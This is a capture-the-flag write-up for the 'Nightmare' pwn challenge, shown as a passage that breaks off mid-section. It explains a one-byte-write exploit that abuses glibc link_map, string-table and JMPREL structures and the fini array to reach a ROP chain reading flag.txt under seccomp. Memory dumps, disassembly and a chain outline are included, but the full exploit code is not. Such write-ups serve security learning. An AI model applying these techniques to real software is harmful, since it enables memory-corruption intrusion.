Nightmare: One Byte to ROP // Alternate Solution
TLDR: One byte write, no leak.
1. Infinite loop through overwrite of the binary's link map
2. Determination of a useful rop gadget, which has to fit several extensive criteria
3. Partial overwrite of DT_JMPREL table pointer
4. Partial overwrite of DT_STRTAB pointer
5. Overwrite of LIBC link map
6. Loop 2-5 until rop chain has been created
7. Partial overwrite of DT_FINI_ARRAYSZ pointer
8. Use 3 & 4 to call exit, to call rop chain
Prologue
This challenge was extremely difficult and I recommend reading the original author's writeup to see how intense the intended method is: https://hackmd.io/@pepsipu/ry-SK44pt. With that mentioned, I'm going to show you a method that ignores most of the primitives stated in that article and takes a completely different approach, one that even the author thought was impossible.
The images above show the struggle that is about to be encountered; they are not meant to harass anyone or cause any trouble.
I won't go into every approach I took on this challenge, as for the first 3ish days I took a wrong approach that I think will turn into a nice ctf challenge, so look out for a modified nightmare in the future.
Next, to fully get an understanding of this challenge I recommend looking up some ret2dlresolve writeups and learning about the different structures used in looking up a function during lazy loading.
Lastly, at first I was not able to get a final working solution on remote. I did get a working version on the remote while writing this writeup; it just took a bit of time and thinking to figure out what was wrong. The remote had a different offset than my local version, and before that the failure came from a bad rop gadget I was using (who would have guessed that puts will call different functions depending on CPU capabilities?). Any address that I use in the writeup I'll try to keep consistent, but these values are not the same as the remote version, so don't worry about them too much. With this all said, I'll start with the actual walkthrough!
Lastly 2, sorry for such a long writeup. I wanted to share as much detail as possible while still keeping most of the useless information out, so you can probably skip to the sections you are most interested in.
Description and hint 1 & 2
Can you pwn when you can't see?
Hint: Partial RELRO? That sounds like a really complex surface...
Hint 2: What happens if Exit doesnt exit?
nc mc.ax 31477
Setup and Reversing
Upon downloading the files and extracting from the zip, we are given a README.md file giving the description below.
## Setup
Nightmare is an extremely environment sensitive challenge. It's important your environment is as accurate as possible.
Tools such as patchelf will clobber continuity between local and remote. Please take care making changes.
You might have noticed that no libc was shipped with this challenge. This is intentional. Please do NOT try to exploit
the binary outside of the provided Docker and utilize the libc and ld within the docker.
You are safe to install tools and other items in the docker. The docker tag is `[email protected]:cc8f713078bfddfe9ace41e29eb73298f52b2c958ccacd1b376b9378e20906ef`.
### Symbols
You can install debug symbols by installing libc6-dbg package. From there, please do NOT unstrip the global libc and ld.
Make a copy and unstrip them without affecting /usr/lib. An unstripping script is provided.
## Remote
Nightmare's remote requires you to submit a static payload to the program. This payload will then be sent to 8 different instances of Nightmare, all of which have `stdout` hidden from the competitor. This prevents leaking ASLR base and bruteforce. In order to submit a payload, simply:
- Send the size of the payload packed as a 8 byte integer
- Send the payload
## Security Measures
The seccomp used can be found in `bin/filter.s`.
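The remote submission format described in the README can be sketched in a few lines. This is only a minimal sketch: the README says "8 byte integer" without naming a byte order, so little-endian is an assumption here, and frame_payload is a hypothetical helper name.

```python
import struct


def frame_payload(payload: bytes) -> bytes:
    """Prefix a static payload with its size packed as an 8-byte integer.

    Assumption: little-endian, as is usual on x86-64. The README does not say.
    """
    return struct.pack("<Q", len(payload)) + payload


if __name__ == "__main__":
    # Nine bytes is the size of a single (offset, byte) record in this challenge.
    print(frame_payload(b"A" * 9).hex())
```

The framed bytes would then be sent to the service as-is; since the payload is static, every write has to be decided before anything is sent.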
Given this information, let's first check the seccomp. I'm partial to using seccomp-tools to determine the seccomp in place:
# seccomp-tools dump ./nightmare
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x08 0x00 0x00000000 if (A == read) goto 0012
0004: 0x15 0x07 0x00 0x00000001 if (A == write) goto 0012
0005: 0x15 0x06 0x00 0x00000002 if (A == open) goto 0012
0006: 0x15 0x05 0x00 0x0000003c if (A == exit) goto 0012
0007: 0x15 0x04 0x00 0x000000e7 if (A == exit_group) goto 0012
0008: 0x15 0x01 0x00 0x00000009 if (A == mmap) goto 0010
0009: 0x05 0x00 0x00 0x00000003 goto 0013
0010: 0x20 0x00 0x00 0x00000020 A = prot # mmap(addr, len, prot, flags, fd, pgoff)
0011: 0x45 0x01 0x00 0x00000004 if (A & 0x4) goto 0013
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0013: 0x06 0x00 0x00 0x00000000 return KILL
We can see we are only allowed read, write, open, and mmap as somewhat useful syscalls... except that the extra restriction on the prot argument of mmap disallows PROT_EXEC on any chunks we create, so this seems less useful.
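To make the filter easier to reason about, here is a small model of the dump above. It is a sketch that mirrors the listed rules only; the function name verdict is hypothetical and nothing here talks to the kernel.

```python
ARCH_X86_64 = 0xC000003E
PROT_EXEC = 0x4
SYS_MMAP = 9

# Syscall numbers copied from the seccomp-tools dump (x86-64).
ALWAYS_ALLOWED = {0: "read", 1: "write", 2: "open", 60: "exit", 231: "exit_group"}


def verdict(arch: int, nr: int, prot: int = 0) -> str:
    """Return ALLOW or KILL the way the dumped filter would.

    prot is only looked at for mmap, matching lines 0010 and 0011 of the dump.
    """
    if arch != ARCH_X86_64:
        return "KILL"
    if nr in ALWAYS_ALLOWED:
        return "ALLOW"
    if nr == SYS_MMAP:
        return "KILL" if prot & PROT_EXEC else "ALLOW"
    return "KILL"


if __name__ == "__main__":
    print(verdict(ARCH_X86_64, 2))            # open
    print(verdict(ARCH_X86_64, SYS_MMAP, 7))  # mmap with PROT_EXEC set
```

Anything not on the list is fatal, which matters later when a libc wrapper turns out to use a different syscall number than expected.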
Let's start reversing.
This is a relatively clear main, so we are looking for something else. We can see a function called nightmare, and after some digging you can find that it is called in __libc_csu_init, being a part of the _init_array list.
Looking at the actual nightmare function, we can see a check on the data at chunk, which may seem weird for a function that should only run once... hint hint. The result of a large malloc is stored in chunk, followed by a call to the seccomp setup. The seccomp setup is normal and I don't believe anything new is being done that requires further analysis.
Next we have the actual meat of the function. There are 2 reads, one of 8 bytes and another of 1 byte. The 8 bytes are used as an offset into the malloced chunk and the 1 byte is written to that location. After this comes a call to write and then _Exit.
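The input for one pass through nightmare is therefore nine bytes. A minimal sketch of building such a record follows; write_record is a hypothetical name, and little-endian packing of the offset is an assumption based on the target being x86-64.

```python
import struct

MASK64 = (1 << 64) - 1


def write_record(offset: int, value: int) -> bytes:
    """Build the 9 bytes consumed by one pass: 8-byte offset, then 1 byte.

    The offset is reduced modulo 2**64 so negative offsets (targets below the
    chunk) pack the same way the pointer arithmetic would wrap.
    """
    return struct.pack("<QB", offset & MASK64, value)


if __name__ == "__main__":
    print(write_record(0x10, 0x28).hex())
```

Every later step of the exploit is just a long concatenation of records like this one.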
Notes:
There are 2 things to realize from this analysis so far. The first is the malloc. Typically, mallocs of large sizes need to invoke a new mmap call; this call creates a new mapping in the process's memory map that will usually be located at the same offset from libc. The memory map below is just an example from my host system and does not use the correct environment, but it will suffice for the example:
0x00007ffff7dd8000 0x00007ffff7dda000 0x0000000000000000 rw- <-- newly mmapped chunk
0x00007ffff7dda000 0x00007ffff7e00000 0x0000000000000000 r-- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7e00000 0x00007ffff7f49000 0x0000000000026000 r-x /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f49000 0x00007ffff7f94000 0x000000000016f000 r-- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f94000 0x00007ffff7f95000 0x00000000001ba000 --- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f95000 0x00007ffff7f98000 0x00000000001ba000 r-- /usr/lib/x86_64-linux-gnu/libc-2.32.so
0x00007ffff7f98000 0x00007ffff7f9b000 0x00000000001bd000 rw- /usr/lib/x86_64-linux-gnu/libc-2.32.so
The malloc'd chunk in this example is located at 0x00007ffff7dd8010 and will always be at the same offset from libc. Take note that this offset depends on your kernel and libc version, which comes into play later. From this, we also know that the ld is typically at a constant offset from libc as well.
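Because the chunk and libc move together under ASLR, a target address from one debugging session can be turned into an offset that is valid for every run. The sketch below uses the addresses from the example map above, which come from the host system and not the challenge docker, so the numbers are illustrative only.

```python
# Addresses copied from the example memory map above (host system, not the docker).
CHUNK = 0x7FFFF7DD8010
LIBC_BASE = 0x7FFFF7DDA000

# Constant distance from the chunk to the start of libc in this example.
CHUNK_TO_LIBC = LIBC_BASE - CHUNK


def offset_for(target_addr: int) -> int:
    """Offset to send so that chunk + offset lands on target_addr."""
    return target_addr - CHUNK


if __name__ == "__main__":
    print(hex(CHUNK_TO_LIBC))
    # Start of libc's rw- mapping in the same example map.
    print(hex(offset_for(0x7FFFF7F98000)))
```

The same subtraction works for the ld mappings, as long as the measurement is taken inside the provided docker.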
Second, and this doesn't play as big of a role in this challenge, there is a difference between the functions exit and _Exit. exit will ultimately call another function called __run_exit_handlers, while _Exit will flat out use the exit system call right away without calling any extraneous functions. Not too important for this exploit, but it does come into play with different exploits.
Infinite Loop
With our ability to write one byte we are extremely limited; luckily we can write to anything that is writeable in libc or the ld. So we need to find something good to write to that gives us more functionality or more writes. At the beginning of this challenge I didn't know exactly where to write, so I wrote a quick brute force script to find an address that would cause the program to hang in a way we could work with, my thought being that a hang means we found a way to call nightmare again. I'm not going to share the actual script, but imagine a loop that walks all writeable addresses in steps of 8 bytes and tests all 256 byte values at each for something that works. Luckily I found 2 hits, 33 and 40, both at the same address ld+0x36220, and looking at this address we see this:
0x7ffff7ffe220: 0x0000555555554000 0x00007ffff7ffe7c8
0x7ffff7ffe230: 0x000055555555a000 0x00007ffff7ffe7d0
0x7ffff7ffe240: 0x0000000000000000 0x00007ffff7ffe220
0x7ffff7ffe250: 0x0000000000000000 0x00007ffff7ffe7b0
0x7ffff7ffe260: 0x0000000000000000 0x000055555555a010
0x7ffff7ffe270: 0x000055555555a0f0 0x000055555555a0e0
0x7ffff7ffe280: 0x0000000000000000 0x000055555555a090
0x7ffff7ffe290: 0x000055555555a0a0 0x000055555555a120
0x7ffff7ffe2a0: 0x000055555555a130 0x000055555555a140
0x7ffff7ffe2b0: 0x000055555555a0b0 0x000055555555a0c0
0x7ffff7ffe2c0: 0x000055555555a020 0x000055555555a030
0x7ffff7ffe2d0: 0x0000000000000000 0x0000000000000000
Some of the addresses may be hard to recognize right away, but the first pointer is the address where our binary is loaded. I'm not 100% confident, but I believe this chunk of data is referred to as the link map of the binary. A crappy description of this structure would be a structure that holds pointers to important information used in the binary. Sorry, but I couldn't find the blog post about it that I read during research again. We will notice that this address is also stored right before the binary's GOT entries in memory:
0x555555558000: 0x0000000000003df8 0x00007ffff7ffe220 <---- Link map
0x555555558010: 0x00007ffff7fe0ee0 0x0000555555555036 <---- _dl_runtime_resolve | exit_plt
0x555555558020 <__st[email protected]>: 0x0000555555555046 0x00007ffff7eaf900
Now we need to take an in-depth look into what happens when we overwrite the first pointer in the link map. As we know, during a function call the instruction flow is actually sent to the plt, then from there to a lookup in the GOT, and if the function has not been resolved yet we make a call to _dl_runtime_resolve. This function ultimately sets up a call to _dl_fixup with the link map and the offset for the function as the arguments. _dl_fixup is responsible for calling other functions that actually look up your function by using pointers in the link map, storing the result in the GOT, then ultimately returning the address to _dl_runtime_resolve, where it jmps to the function it looked up.
If you remember, our brute force found that writing either 33 or 40 to the link map works, but what does this mean? As it turns out, in _dl_fixup the first pointer in the link map is used as the base for the GOT address to write to, the offset being the value specified in the JMPREL table in the binary.
Normally, write would be stored at binary+0x4018, but by placing 40 we now fool _dl_fixup into storing the address of write at binary+0x4018+40, or binary+0x4040, which happens to be the GOT address for _Exit. Instead of _Exit being looked up, we just end up calling write instead. If you remember back to the reversing section, there is no ret after the call to _Exit; instead execution falls through into whatever function comes next. This happens to be main, then __libc_csu_init, which is the function that calls nightmare for us. This is how our infinite loop works. If you are looking closely you may notice that RDI is set to 0 before the _Exit (write) call and think that the program is writing to stdin, but write just fails in this instance so we don't need to worry about anything.
You may remember that both 33 and 40 worked as values. If you look at 33, this is actually a partial overwrite of the _Exit GOT value with the upper byte of the address of the write function in libc, 0x00. Instead of pointing to its plt stub at 0x1086 as it normally would, it now points to 0x1000, which happens to be _init_proc, and this calls __gmon_start__, which will call __libc_csu_init for us.
Either should work, but they will affect the stack differently if you plan to implement this yourself and use different rop gadgets later on.
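Both hits can be checked with a byte-level model of the store that _dl_fixup performs. The sketch below is a simplification under stated assumptions: GOT contents are kept as offsets from the load base, WRITE_ADDR is just an example libc address taken from the GOT dump above (what matters is that its top byte is 0x00), and fixup_store and fresh_image are hypothetical names.

```python
import struct

GOT_WRITE = 0x4018  # r_offset used for write, per the text
GOT_EXIT = 0x4040   # GOT slot of _Exit, per the text
EXIT_PLT = 0x1086   # unresolved _Exit GOT value (its plt stub), per the text
WRITE_ADDR = 0x00007FFFF7EAF900  # example libc address; top byte is 0x00


def fresh_image() -> bytearray:
    """Tiny stand-in for the binary with only the _Exit GOT slot filled in."""
    image = bytearray(0x5000)
    struct.pack_into("<Q", image, GOT_EXIT, EXIT_PLT)
    return image


def fixup_store(image: bytearray, l_addr_low_byte: int) -> int:
    """Mimic *(l_addr + r_offset) = resolved address, return the _Exit slot.

    The real l_addr is page aligned, so overwriting its low byte simply adds
    that byte to the address of the store.
    """
    target = l_addr_low_byte + GOT_WRITE
    image[target:target + 8] = struct.pack("<Q", WRITE_ADDR)
    return struct.unpack_from("<Q", image, GOT_EXIT)[0]


if __name__ == "__main__":
    print(hex(fixup_store(fresh_image(), 40)))  # whole slot replaced
    print(hex(fixup_store(fresh_image(), 33)))  # only the low byte replaced
```

With 40 the whole _Exit slot receives the resolved address; with 33 only the final 0x00 byte of the stored address spills into the slot, turning 0x1086 into 0x1000.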
Function Lookup
At this point we have an infinite write, but what do we really target? We also have an infinite lookup for the function write, as we never overwrite its GOT entry and instead overwrote the one for _Exit. If we keep looking through _dl_fixup we will notice that several of the pointers are referenced to determine what function should be found. One of these is link_map+0x68, or the string table lookup pointer. Since we don't know where we are in memory, binary or libc wise, we are stuck with partial overwrites. Luckily for us, there happens to be a pointer nearby that points to a variable called _r_debug, and more importantly to a writeable piece of memory.
0x558e56a95e78: 0x0000000000000005 0x0000558e56a92500 <-- string table
0x558e56a95e88: 0x0000000000000006 0x0000558e56a923e0
0x558e56a95e98: 0x000000000000000a 0x00000000000000b6
0x558e56a95ea8: 0x000000000000000b 0x0000000000000018
0x558e56a95eb8: 0x0000000000000015 0x00007f9cb24ca100 <--- _r_debug
If we set a string at _r_debug+0x4b, the original offset into the string table for the write function name, we can now call whatever function we want. At this point I got stuck for a bit as I couldn't figure out a great primitive to do anything with this. We don't control the arguments and we only call the beginning of each function, so what can we do? If we utilize the same primitive we used to overwrite the _Exit GOT entry we can write to the memory after the GOT, but we are limited to 0xfe-ish bytes past the _Exit GOT entry.
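The string table trick boils down to two things: one byte that retargets the pointer at link_map+0x68 to the dynamic entry holding _r_debug, and a run of one-byte writes that place a symbol name. Here is a hedged sketch of both; the entry addresses come from the dump above, my reading is that the pointer targets the 16-byte dynamic entry itself, and both function names are hypothetical.

```python
NAME_OFFSET = 0x4B  # offset of "write" in the real string table, per the text


def redirect_byte(strtab_entry: int, debug_entry: int) -> int:
    """Low byte to write so the string table pointer targets the _r_debug entry.

    Only works when both dynamic entries share every byte above the lowest one.
    """
    if strtab_entry >> 8 != debug_entry >> 8:
        raise ValueError("a single byte cannot reach that entry")
    return debug_entry & 0xFF


def name_writes(r_debug_offset: int, name: str):
    """(offset, byte) pairs placing a NUL-terminated name at _r_debug+0x4b.

    r_debug_offset is the offset of _r_debug from the chunk, found separately.
    """
    data = name.encode() + b"\x00"
    return [(r_debug_offset + NAME_OFFSET + i, b) for i, b in enumerate(data)]


if __name__ == "__main__":
    # Entry addresses as they appear in the dynamic section dump above.
    print(hex(redirect_byte(0x558E56A95E78, 0x558E56A95EB8)))
    print(name_writes(0x1000, "exit"))
```

Each pair from name_writes costs one pass through nightmare, which is why the infinite loop had to come first.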
At this point I was stuck, so I wrote another brute force to try and find something useful... This one used a modified nightmare binary that allowed me to write 8 bytes at once to an address, which let me quickly search for any segfaults that we could maybe use. After some checking I found one at libc+0x228000, in the memory map between the libc and the ld:
0x7f9cb2490000: 0x00007f9cb2268000 0x00007f9cb24caee0
0x7f9cb2490010: 0x00007f9cb247fbc0 0x00007f9cb24c9a48
0x7f9cb2490020: 0x00007f9cb24ca7d0 0x00007f9cb2490000
0x7f9cb2490030: 0x0000000000000000 0x00007f9cb2490490
0x7f9cb2490040: 0x0000000000000000 0x00007f9cb247fbc0
0x7f9cb2490050: 0x00007f9cb247fc70 0x00007f9cb247fc60
0x7f9cb2490060: 0x00007f9cb247fc00 0x00007f9cb247fc20
0x7f9cb2490070: 0x00007f9cb247fc30 0x00007f9cb247fca0
0x7f9cb2490080: 0x00007f9cb247fcb0 0x00007f9cb247fcc0
0x7f9cb2490090: 0x00007f9cb247fc40 0x00007f9cb247fc50
0x7f9cb24900a0: 0x0000000000000000 0x0000000000000000
0x7f9cb24900b0: 0x00007f9cb247fbd0 0x0000000000000000
This chunk of memory actually has the same layout as our binary link_map, and in fact is libc's link_map. The pointers here point to all sorts of goodies such as the function lookup table, which I didn't even attempt to forge as I thought it would be too much of a pain to work out custom functions, if it's even possible. That's a whole sub series of libc internals I want to stay away from. Now, when we overwrite this first pointer we get a segfault when trying to jump to what should be the address of write from inside _dl_runtime_resolve, with RIP being 0x1179a0, or the exact offset to write from the beginning of libc. So with a partial overwrite of this pointer it looks like we can now control an offset into a function to call, similar to our write ability with our binary.
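The effect of that partial overwrite is plain addition: the resolver returns libc's base pointer plus the symbol's offset, so changing the low byte of the base shifts the result by up to 0xff. A small sketch, using the libc base from the dump above; resolved_address and low_byte_for are hypothetical names.

```python
WRITE_OFFSET = 0x1179A0  # offset of write inside libc, per the crash above


def resolved_address(l_addr: int, low_byte: int, sym_offset: int = WRITE_OFFSET) -> int:
    """Address handed back by the lookup once l_addr's low byte is replaced."""
    forged = (l_addr & ~0xFF) | low_byte
    return forged + sym_offset


def low_byte_for(sym_offset: int, gadget_offset: int) -> int:
    """Byte to place in l_addr so the lookup of a symbol lands on a gadget."""
    delta = gadget_offset - sym_offset
    if not 0 <= delta <= 0xFF:
        raise ValueError("gadget is not within one byte of the symbol")
    return delta


if __name__ == "__main__":
    libc_base = 0x7F9CB2268000  # first pointer of libc's link_map in the dump
    print(hex(resolved_address(libc_base, 0x10)))
    print(hex(low_byte_for(WRITE_OFFSET, WRITE_OFFSET + 0x1A)))
```

The range check is the whole limitation in one line: a gadget is only usable if it sits at most 0xff bytes after the start of a symbol that resolves.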
PIVOT
The previous primitive sounds perfect for gadgets... kind of. You have to remember that any gadget we use will ultimately be called during the lookup, so we need a chain that can effectively be called in the moment as well as be stored in memory using our past-the-GOT write; with these we can set up a chain to pivot to. How do we actually pivot to it though? We don't control any arguments or registers when the gadgets are called, and there is NO useful data on the stack that points anywhere near where our chain would be. So how do we get to our chain? This is a little out of order, as I thought this had to be the intended way and was confident a pivot existed, and was later crushed by the author when his hints made it sound like this was impossible, but one hint did help. That was on the last night, after learning that he had full control of the arguments for _dl_lookup, which at that point I thought was a dream.
Even though at this point I knew our approaches were different enough to merit almost giving up, I hoped that maybe there was something of use here, and looking at the source code I found one glimmer of hope.
while (i-- > 0)
((fini_t) array[i]) ();
Now how do we get there? As nice as our lookup primitive is, it doesn't actually work for all functions and symbols, and as such we can't use our fake string table to fake a call to _dl_fini. Testing out some different things, I started to wonder if other functions would reference it, the big target being the regular exit function. As the name _dl_fini suggests, maybe this is something that gets called to help clean up memory and a binary, and lo and behold we are greeted with execution passing through _dl_fini after calling exit. After some digging, we are able to determine that the fini_t array above in the source code is actually the fini array from our binary, at binary+0x3df0.
If you don't know about the dtors/fini_array, it is a list similar to the one that houses the nightmare call at the beginning of the program, usually called the _init_array, but the opposite: instead of helping build up for the binary to execute, it helps tear it down. Currently all that is in this list is a pointer to the binary's function __do_global_dtors_aux. To me the code can be a bit obscure as to how the fini_t array is set, but I'll show you anyway:
ElfW(Addr) *array =
(ElfW(Addr) *) (l->l_addr
+ l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
/ sizeof (ElfW(Addr)));
while (i-- > 0)
((fini_t) array[i]) ();
If you can't figure out what is happening here just by looking I don't blame you, but what if I told you that l is our binary link_map? Then it may make more sense. This is saying that l->l_addr + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr is our array, or more precisely, Binary address + fini_array offset. It is important to realize that we can overwrite both the pointer to the fini_array offset and the original Binary address, as they are both stored in the link_map; the problem is, we still can't get a pivot to our fake stack this way:
0x558e56a95e08: 0x000000000000000c 0x0000000000001000
0x558e56a95e18: 0x000000000000000d 0x0000000000001478
0x558e56a95e28: 0x0000000000000019 0x0000000000003de0 <--- fini array offset
0x558e56a95e38: 0x000000000000001b 0x0000000000000010
0x558e56a95e48: 0x000000000000001a 0x0000000000003df0 <--- init array offset
0x558e56a95e58: 0x000000000000001c 0x0000000000000008 <--- fini array size
0x558e56a95e68: 0x000000006ffffef5 0x0000558e56a923c0
0x558e56a95e78: 0x0000000000000005 0x0000558e56a92500
0x558e56a95e88: 0x0000000000000006 0x0000558e56a923e0
0x558e56a95e98: 0x000000000000000a 0x00000000000000b6
0x558e56a95ea8: 0x000000000000000b 0x0000000000000018
0x558e56a95eb8: 0x0000000000000015 0x00007f9cb24ca100
0x558e56a95ec8: 0x0000000000000003 0x0000558e56a96000
0x558e56a95ed8: 0x0000000000000002 0x0000000000000090
0x558e56a95ee8: 0x0000000000000014 0x0000000000000007
0x558e56a95ef8: 0x0000000000000017 0x0000558e56a926d8
We could try to move the fini_array offset to point to something else, but remember we are dealing with only a single byte overwrite, so we need to stay in the same byte range, and sadly no offsets there would get us to our fake stack. You may have noticed 2 things though. First, the fini array offset is off by 8 bytes from where it actually is in memory. Looking back at the source, you may see the variable i being set and used as an index, so we are effectively starting at index 1 and not going lower than that. But this i variable is set from the link map as well, so what if we forged the size, since the loop goes from the top index down to the bottom? 0x90 or 0xb6 look like good targets but are still not enough to get us from 0x3de0, the fini array, to 0x4010+, our rop chain location. What about the 0x1000 at the top of the list though? Using that, we make the program think the fini array has 0x200 entries and will start at 0x4de0, or writeable memory. The only problem is, we can currently only write 0xfe-ish bytes past the _Exit GOT entry, approx 0x4100, nowhere near 0x4de0.
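The size forgery is easier to follow with the loop from _dl_fini written out. The sketch below reproduces only the index arithmetic; the array offset is a parameter because it depends on which dynamic entry the link map points at, and fini_call_slots is a hypothetical name. With the numbers used in the text (offset 0x3de0, forged size 0x1000) the array ends at 0x4de0 and the first slot called sits 8 bytes below that.

```python
PTR_SIZE = 8  # sizeof(ElfW(Addr)) on x86-64


def fini_call_slots(array_offset: int, size_bytes: int):
    """Offsets from l_addr of the slots _dl_fini calls, in call order.

    Mirrors: i = size / sizeof(ptr); while (i-- > 0) array[i]();
    """
    count = size_bytes // PTR_SIZE
    return [array_offset + i * PTR_SIZE for i in range(count - 1, -1, -1)]


if __name__ == "__main__":
    real = fini_call_slots(0x3DE0, 0x8)
    forged = fini_call_slots(0x3DE0, 0x1000)
    print([hex(s) for s in real])
    print(len(forged), hex(forged[0]), hex(forged[-1]))
```

Since the calls run from the top slot downward, the chain has to be laid out in reverse, with the first gadget at the highest address.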
I got stuck here for a bit thinking that all the hopes and dreams for a perfect setup had been squashed, until I did some testing. Below is the _r_debug data.
0x7f9cb24ca100 <_r_debug>: 0x0000000000004db0 0x00007f9cb24ca207
0x7f9cb24ca110 <_r_debug+16>: 0x00007f9cb24a6170 0x0000000000000000
0x7f9cb24ca120 <_r_debug+32>: 0x00007f9cb2494000 0x0000000000000000
0x7f9cb24ca130: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca140: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca150: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca160: 0x0000000000000000 0x0000000000000000
0x7f9cb24ca170: 0x0000000000000000 0x0000000000000000
At the time, I was under the impression that this data was important and actually thought it was referenced during _dl_fixup, but I thought it was worth a try and zeroed it out, and to my surprise there was no crash. This is the target now. If you remember back, our fake string is located at _r_debug+0x4b, and if we can fake the string table why not fake the jmp_rel table, as this holds the offset into the binary where the address resolved by _dl_fixup is actually stored. Look how lucky this turned out to be:
0x558e56a95e08: 0x000000000000000c 0x0000000000001000
0x558e56a95e18: 0x000000000000000d 0x0000000000001478
0x558e56a95e28: 0x0000000000000019 0x0000000000003de0 <--- fini array offset
0x558e56a95e38: 0x000000000000001b 0x0000000000000010
0x558e56a95e48: 0x000000000000001a 0x0000000000003df0 <--- init array offset
0x558e56a95e58: 0x000000000000001c 0x0000000000000008 <--- fini array size
0x558e56a95e68: 0x000000006ffffef5 0x0000558e56a923c0
0x558e56a95e78: 0x0000000000000005 0x0000558e56a92500 <-- string table
0x558e56a95e88: 0x0000000000000006 0x0000558e56a923e0
0x558e56a95e98: 0x000000000000000a 0x00000000000000b6
0x558e56a95ea8: 0x000000000000000b 0x0000000000000018
0x558e56a95eb8: 0x0000000000000015 0x00007f9cb24ca100 <--- _r_debug
0x558e56a95ec8: 0x0000000000000003 0x0000558e56a96000
0x558e56a95ed8: 0x0000000000000002 0x0000000000000090
0x558e56a95ee8: 0x0000000000000014 0x0000000000000007
0x558e56a95ef8: 0x0000000000000017 0x0000558e56a926d8 <-- jmp_rel table
With this being on the same 0x100 boundary as _r_debug, we can point it at _r_debug and now have a fake jmp_rel entry to write to the 0x4de0 offset we need! With that we can finally create the chain, load it into a fake fini array location and jump down the chain.
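For reference, a jmp_rel entry on x86-64 is a 24-byte Elf64_Rela record, so forging one inside _r_debug means writing those 24 bytes one at a time. The sketch below only shows the layout. The offset 0x4db0 is simply the value visible in the _r_debug dump above and is used as an example, the symbol index 3 is a made-up placeholder, and fake_rela and byte_writes are hypothetical names.

```python
import struct

R_X86_64_JUMP_SLOT = 7  # relocation type used for plt entries on x86-64


def fake_rela(r_offset: int, sym_index: int, addend: int = 0) -> bytes:
    """Pack an Elf64_Rela: r_offset, r_info = (sym << 32) | type, r_addend."""
    r_info = (sym_index << 32) | R_X86_64_JUMP_SLOT
    return struct.pack("<QQq", r_offset, r_info, addend)


def byte_writes(base_offset: int, blob: bytes):
    """Split a blob into (offset, byte) pairs, skipping bytes that are zero.

    Assumes the destination was zeroed beforehand, as described in the text.
    """
    return [(base_offset + i, b) for i, b in enumerate(blob) if b]


if __name__ == "__main__":
    entry = fake_rela(0x4DB0, sym_index=3)  # sym_index is a placeholder
    print(entry.hex())
    print(byte_writes(0x0, entry))
```

Bumping r_offset by 8 between lookups moves the store to the next slot of the fake fini array.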
ROP Till You Drop
I know what you are thinking: the hardest part is done and all that is left is to create the chain and win. That is where you would be wrong. If I had to guess, I would say that this is the worst part of the challenge, and it took over 80% of my time on it, for the following reasons:
- Each gadget that is stored in our array will be called in the _dl_runtime_resolve function. This means no gadgets that pop from the stack or modify RSP, as we need a way to get back to our nightmare function successfully.
- Each gadget can be at an offset of at most 0xff from a valid function lookup. I don't know how many times I found a gadget I wanted but the symbol wouldn't resolve, or I found a perfect gadget but it wasn't near a function.
- The function that houses our gadget has to have a return primitive that lines up with write as well. This is kind of vague, but let's think it through. Our primitive for this exploit is essentially a 1 byte write; then for a lookup we need to set up a string in memory, point to this string, then change to an offset into this function to store in our fini array. This can't be done all at once. We need a setup where we can do all these things without crashing or dereferencing data from a register that isn't a pointer. This means jumping into an offset of write, then changing to our function, changing to the address we want to store, changing our stack pointer so we don't overwrite it, changing back to the old address of our function, then changing back to write, rinse, repeat.
- We can't use the RDX register. This may be a bit confusing, but look at the assembly below from _dl_fini:
0x00007ffff7fe2483 <+403>: mov r14,QWORD PTR [rax+0x8]
0x00007ffff7fe2487 <+407>: mov rax,QWORD PTR [r15+0x120]
0x00007ffff7fe248e <+414>: mov rsi,QWORD PTR [r15]
0x00007ffff7fe2491 <+417>: mov rdx,QWORD PTR [rax+0x8]
0x00007ffff7fe2495 <+421>: add rsi,r14
0x00007ffff7fe2498 <+424>: shr rdx,0x3
0x00007ffff7fe249c <+428>: mov QWORD PTR [rbp-0x38],rsi
0x00007ffff7fe24a0 <+432>: lea eax,[rdx-0x1]
0x00007ffff7fe24a3 <+435>: lea r14,[rsi+rax*8]
0x00007ffff7fe24a7 <+439>: test edx,edx
0x00007ffff7fe24a9 <+441>: je 0x7ffff7fe24c0 <_dl_fini+464>
0x00007ffff7fe24ab <+443>: nop DWORD PTR [rax+rax*1+0x0]
0x00007ffff7fe24b0 <+448>: call QWORD PTR [r14] <-- call our array item
0x00007ffff7fe24b3 <+451>: mov rdx,r14
0x00007ffff7fe24b6 <+454>: sub r14,0x8
0x00007ffff7fe24ba <+458>: cmp QWORD PTR [rbp-0x38],rdx
0x00007ffff7fe24be <+462>: jne 0x7ffff7fe24b0 <_dl_fini+448>
R14 points to our fini array and will be called at +448, but afterwards this value is stored into RDX, thereby clobbering any data we store in there. This wouldn't be a problem if read, write, and partially open didn't all use RDX as the third argument. You may be thinking, why not just pivot to the stack at this point if rdx points to your fini array, since a call to setcontext would get you a win? But don't forget point 1 above. All stored values need to be called at least once, so a pivot to rdx will crash our program way before this issue comes up.
In my opinion all of these points turned out to be the hardest aspects of this challenge, hence the name of this section, ROP till you drop. I began to understand why the author thought this was impossible.
The next section will just show the gadgets I was able to find, then put it all together into a cohesive chain to understand. I don't think I can articulate the approx 20+ hours probably spent just looking for ROP gadgets. I also won't show the offsets that I had to find within write and the other functions so I could load each gadget into memory successfully. If you want to see them all, they are in the exploit file.
RSI Gadget
Looking for gadgets we should lay out what we actually need to do,
mov rax, 2
mov rdi, "flag.txt\x00"
mov rsi, 0
syscall = open syscall
mov rdi, rax
mov rax, 0
mov rsi, {Buffer} for flag to read to
mov rdx, value less than 0x1000 (I'll explain below)
syscall = read syscall
